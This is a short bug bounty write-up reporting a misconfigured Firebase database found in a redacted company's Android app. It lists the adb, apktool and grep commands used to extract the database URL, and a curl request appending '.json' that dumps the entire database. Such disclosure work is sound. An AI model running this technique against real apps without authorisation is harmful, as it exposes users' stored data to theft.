WRITE UP – PRIVATE BUG BOUNTY: Firebase database exposed by misconfiguration – $2,000 USD


Introduction:

Hi everyone It’s been a while since my last post but I’m back, I want to tell you a short story about a private bug bounty program and why you can always check the basic payloads because you will be surprised that sometimes will work.

If you like Bug Bounty writeups please check my handbook Bug Bounty Write Ups Collection


Report Summary:

Hi REDACTED team, I was able to find a firebase instance URL misconfigured exposed in your REDACTED Android application.

Proof of concept:

1.- Get the latest REDACTED Android application, in my case I downloaded it to my phone (connect the phone in debug mode) and then pull out the APK with adb tools. (com.REDACTED.android.main is the APK package name):

omespino@h0st:~# adb pull data/app/com.REDACTED.android.main/base.apk

2.- Then I decompile the APK with the following command apktool:

omespino@h0st:~# apktool d base.apk

3.- Then I justgrep for firebase and HTTP strings in the “base/AndroidManifest.xml” file.

# grep for firebase and HTTP strings and got some URLs including the firebaseio.com one
omespino@h0st:~# grep -ir firebase | grep http 
- redacted - 
 ...
 ...
 "https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/"
 ...
 ...
- redacted -

4.- Simple POC to see the firebase misconfiguration (just append .json to the URL):

omespino@h0st:~# curl -X GET -H "REDACTED-Security: @omespino" https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/.json

5.- See the full firebase database exposed because is misconfigured with bad permissions.

PD. I made the request and the stopped after testing that was vulnerable.


Environment and tools

adb Android Debug Bridge version 1.0.39
apktool 2.3.3

Impact

Since the full firebase database instance is misconfigured, anyone can pull the whole database.


Well that’s it, share your thoughts, what do you think about how they handle that security issue? If you have any doubt, comments or suggestions just drop me a line here or on Twitter @omespino, read you later.

Leave a Reply

Your email address will not be published.